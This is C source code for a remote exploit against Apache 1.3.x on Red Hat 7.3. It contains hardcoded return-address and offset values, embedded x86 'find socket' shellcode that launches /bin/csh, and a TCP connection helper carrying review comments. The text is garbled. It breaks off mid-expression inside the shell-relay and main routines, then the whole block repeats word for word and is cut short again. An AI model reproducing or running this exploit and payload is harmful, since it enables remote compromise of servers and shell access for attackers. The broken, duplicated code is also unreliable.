/* SSRC ( sgiCREW Security Research Center) * This is just proof of concept code. * At the most cases it will not work. Probably you'll exploit some redhats but * the main functions of this code are not ready for the public yet! * apache 1.3.23 (default redhat 7.3 installation) [ successed with this code ] * linux/x86 apache <= 1.3.23 [ ohh... forget it for now. you'll need brute force * method for the offset and retaddr. Not supported by this code version ] * yellow dog linux/ppc apache <= 1.3.24 [ should work. ] * look into your error_log file * if exploitatation is not sucessful you will recieve: * [notice] ... exit signal Segmentation fault ... * Then try with different offset. * The retaddr. is fixed for redhat 7.3 so you will not have any problems. * It should work with other apache versions... So go to play * with objdump. * version 0.1.2 * thanks to: * hsj and jetli * private! private! * brought to you by ssrc */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define OFFSET 0xfbd8888a // blah is that correct? // yes... for redhat 7.3 #define RET 0x0808528c // should work. play with objdump if you need // other retaddr. so the code will work against // other linux distr. and apache versions #define RET_OFF 914 #define NOP 0x41 #define PORT_OFF 46 /* heh linux find socket shellcode in 400 bytes. 
pretty nice isn't it */

/*
 * Embedded machine-code payload, stored as a raw byte string. The author's
 * comment calls it Linux "find socket" shellcode. The bytes include the
 * ASCII for "/bin", "/csh" and "-i" plus several \xcd\x80 sequences
 * (x86 `int 0x80`), which suggests a Linux/x86 payload that ends in a shell.
 * Treat the array as hostile data: it is opaque to source review and should
 * only be analysed in an isolated environment. The literal byte sequence is
 * suitable as a static signature when hunting for copies of this file.
 */
char shellcode[] =
    "\xeb\x39\x5e\x8d\x46\x0c\x89\x46\x04\x89\xc7\x8d\x46\x1c\x89\x46"
    "\x08\x31\xdb\xb3\x10\x89\x18\x31\xc9\xb1\xff\x31\xc0\x89\xca\x89"
    "\x0e\xb0\x66\xb3\x07\x89\xf1\xcd\x80\x89\xd1\x85\xc0\x75\x08\x66"
    "\x81\x7f\x02\x34\x12\x74\x06\xe2\xe2\xeb\x45\xeb\x4a\x89\xcb\x31"
    "\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\xc7\x06\x2f"
    "\x62\x69\x6e\xc7\x46\x04\x2f\x63\x73\x68\xc7\x46\x0c\x2d\x69\x41"
    "\x41\x89\x76\x10\x8d\x46\x0c\x89\x46\x14\x8d\x4e\x10\x8d\x56\x18"
    "\x31\xc0\x89\x02\x89\x46\x08\x88\x46\x0e\x89\xf3\xb0\x0b\xcd\x80"
    "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x76\xff\xff\xff";

/**
 * Open a TCP/IPv4 connection to address:port with a 30 second timeout.
 *
 * The socket is switched to non-blocking mode for the connect, the result is
 * collected through select() and SO_ERROR, and blocking mode is restored
 * before the descriptor is returned.
 *
 * @param address  dotted-quad string or host name (resolved with
 *                 gethostbyname() when inet_addr() cannot parse it)
 * @param port     destination TCP port in host byte order
 * @return the connected descriptor on success, otherwise a negative code:
 *         -1 socket() failed, -2 bind() failed, -3 name lookup failed,
 *         -4 select() failed, -5 no result within 30 s,
 *         -6 SO_ERROR reported a failure (errno is set to that value) or the
 *            returned option length was not sizeof(int).
 *         The socket is closed on every error path after its creation.
 */
int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    struct hostent *host;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0) return -1;

    /* Explicit local bind: any local address, port 0. */
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;
    if(bind(s,(struct sockaddr *)&server,sizeof(server))<0)
    {
        close(s);
        return -2;
    }

    /* NOTE(review): only `server` is zeroed above; `target` is filled field by
     * field, so its remaining bytes are uninitialised stack contents. */
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    /* inet_addr() signals a parse failure with an all-ones value, which is
     * what the comparison with -1 tests before falling back to DNS. */
    if(target.sin_addr.s_addr==-1)
    {
        host = gethostbyname(address);
        if(host==0)
        {
            close(s);
            return -3;
        }
        /* NOTE(review): h_length is copied as-is and is not checked against
         * sizeof(target.sin_addr). */
        memcpy(&(target.sin_addr),*(host->h_addr_list),host->h_length);
    }
    target.sin_port = htons(port);

    /* bf = 1 enables non-blocking I/O so connect() cannot hang indefinitely. */
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 30;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    /* The return value of connect() is deliberately not inspected here; the
     * outcome is read back below once select() reports the socket writable. */
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -4;
    }
    if(i==0)
    {
        /* select() returned 0: the 30 s timeout expired. */
        close(s);
        return -5;
    }

    /* NOTE(review): `i` is an int used as the option-length argument; current
     * prototypes expect a socklen_t pointer. */
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -6;
    }

    /* bf is 0 on this path, so this call switches the socket back to blocking. */
    ioctl(s,FIONBIO,&bf);
    return s;
}

/*
 * sh(): only the opening of this function is present on this line. It
 * declares two 128-byte buffers and starts computing fd_cnt from the largest
 * of the three descriptors. The rest of the body is on the following line,
 * where this copy has lost text (the loop condition is incomplete), so its
 * behaviour cannot be documented from here.
 */
int sh(int in,int out,int s)
{
    char sbuf[128],rbuf[128];
    int i,ti,fd_cnt,ret=0,slen=0,rlen=0;
    fd_set rd,wr;

    fd_cnt = in > out ? in : out;
    fd_cnt = s > fd_cnt ?
s : fd_cnt; fd_cnt++; for(;;) { FD_ZERO(&rd); if(rlen>(i*8))&0xff)=='\r')||(((RET>>(i*8))&0xff)=='\n')) break; } if(i!=4) { fprintf(stderr,"bad ret-addr.\n"); return -1; } if(!(p=malloc((sizeof(buf)+sizeof(buf2)+32)*32+1024))) { fprintf(stderr,"can not alloc memory.\n"); return -2; } sock = make_connection(argv[1],atoi(argv[2])); if(sock<0) { fprintf(stderr,"can not connect to %s.\n",argv[1]); return -3; /* SSRC ( sgiCREW Security Research Center) * This is just proof of concept code. * At the most cases it will not work. Probably you'll exploit some redhats but * the main functions of this code are not ready for the public yet! * apache 1.3.23 (default redhat 7.3 installation) [ successed with this code ] * linux/x86 apache <= 1.3.23 [ ohh... forget it for now. you'll need brute force * method for the offset and retaddr. Not supported by this code version ] * yellow dog linux/ppc apache <= 1.3.24 [ should work. ] * look into your error_log file * if exploitatation is not sucessful you will recieve: * [notice] ... exit signal Segmentation fault ... * Then try with different offset. * The retaddr. is fixed for redhat 7.3 so you will not have any problems. * It should work with other apache versions... So go to play * with objdump. * version 0.1.2 * thanks to: * hsj and jetli * private! private! * brought to you by ssrc */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define OFFSET 0xfbd8888a // blah is that correct? // yes... for redhat 7.3 #define RET 0x0808528c // should work. play with objdump if you need // other retaddr. so the code will work against // other linux distr. and apache versions #define RET_OFF 914 #define NOP 0x41 #define PORT_OFF 46 /* heh linux find socket shellcode in 400 bytes. 
pretty nice isn't it */

/*
 * Embedded machine-code payload, stored as a raw byte string. The author's
 * comment calls it Linux "find socket" shellcode. The bytes include the
 * ASCII for "/bin", "/csh" and "-i" plus several \xcd\x80 sequences
 * (x86 `int 0x80`), which suggests a Linux/x86 payload that ends in a shell.
 * Treat the array as hostile data: it is opaque to source review and should
 * only be analysed in an isolated environment. The literal byte sequence is
 * suitable as a static signature when hunting for copies of this file.
 */
char shellcode[] =
    "\xeb\x39\x5e\x8d\x46\x0c\x89\x46\x04\x89\xc7\x8d\x46\x1c\x89\x46"
    "\x08\x31\xdb\xb3\x10\x89\x18\x31\xc9\xb1\xff\x31\xc0\x89\xca\x89"
    "\x0e\xb0\x66\xb3\x07\x89\xf1\xcd\x80\x89\xd1\x85\xc0\x75\x08\x66"
    "\x81\x7f\x02\x34\x12\x74\x06\xe2\xe2\xeb\x45\xeb\x4a\x89\xcb\x31"
    "\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\xc7\x06\x2f"
    "\x62\x69\x6e\xc7\x46\x04\x2f\x63\x73\x68\xc7\x46\x0c\x2d\x69\x41"
    "\x41\x89\x76\x10\x8d\x46\x0c\x89\x46\x14\x8d\x4e\x10\x8d\x56\x18"
    "\x31\xc0\x89\x02\x89\x46\x08\x88\x46\x0e\x89\xf3\xb0\x0b\xcd\x80"
    "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x76\xff\xff\xff";

/**
 * Open a TCP/IPv4 connection to address:port with a 30 second timeout.
 *
 * The socket is switched to non-blocking mode for the connect, the result is
 * collected through select() and SO_ERROR, and blocking mode is restored
 * before the descriptor is returned.
 *
 * @param address  dotted-quad string or host name (resolved with
 *                 gethostbyname() when inet_addr() cannot parse it)
 * @param port     destination TCP port in host byte order
 * @return the connected descriptor on success, otherwise a negative code:
 *         -1 socket() failed, -2 bind() failed, -3 name lookup failed,
 *         -4 select() failed, -5 no result within 30 s,
 *         -6 SO_ERROR reported a failure (errno is set to that value) or the
 *            returned option length was not sizeof(int).
 *         The socket is closed on every error path after its creation.
 */
int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    struct hostent *host;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0) return -1;

    /* Explicit local bind: any local address, port 0. */
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;
    if(bind(s,(struct sockaddr *)&server,sizeof(server))<0)
    {
        close(s);
        return -2;
    }

    /* NOTE(review): only `server` is zeroed above; `target` is filled field by
     * field, so its remaining bytes are uninitialised stack contents. */
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    /* inet_addr() signals a parse failure with an all-ones value, which is
     * what the comparison with -1 tests before falling back to DNS. */
    if(target.sin_addr.s_addr==-1)
    {
        host = gethostbyname(address);
        if(host==0)
        {
            close(s);
            return -3;
        }
        /* NOTE(review): h_length is copied as-is and is not checked against
         * sizeof(target.sin_addr). */
        memcpy(&(target.sin_addr),*(host->h_addr_list),host->h_length);
    }
    target.sin_port = htons(port);

    /* bf = 1 enables non-blocking I/O so connect() cannot hang indefinitely. */
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 30;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    /* The return value of connect() is deliberately not inspected here; the
     * outcome is read back below once select() reports the socket writable. */
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -4;
    }
    if(i==0)
    {
        /* select() returned 0: the 30 s timeout expired. */
        close(s);
        return -5;
    }

    /* NOTE(review): `i` is an int used as the option-length argument; current
     * prototypes expect a socklen_t pointer. */
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -6;
    }

    /* bf is 0 on this path, so this call switches the socket back to blocking. */
    ioctl(s,FIONBIO,&bf);
    return s;
}

/*
 * sh(): only the opening of this function is present on this line. It
 * declares two 128-byte buffers and starts computing fd_cnt from the largest
 * of the three descriptors. The rest of the body is on the following line,
 * where this copy has lost text (the loop condition is incomplete), so its
 * behaviour cannot be documented from here.
 */
int sh(int in,int out,int s)
{
    char sbuf[128],rbuf[128];
    int i,ti,fd_cnt,ret=0,slen=0,rlen=0;
    fd_set rd,wr;

    fd_cnt = in > out ? in : out;
    fd_cnt = s > fd_cnt ?
s : fd_cnt; fd_cnt++; for(;;) { FD_ZERO(&rd); if(rlen>(i*8))&0xff)=='\r')||(((RET>>(i*8))&0xff)=='\n')) break; } if(i!=4) { fprintf(stderr,"bad ret-addr.\n"); return -1; } if(!(p=malloc((sizeof(buf)+sizeof(buf2)+32)*32+1024))) { fprintf(stderr,"can not alloc memory.\n"); return -2; } sock = make_connection(argv[1],atoi(argv[2])); if(sock<0) { fprintf(stderr,"can not connect to %s.\n",argv[1]);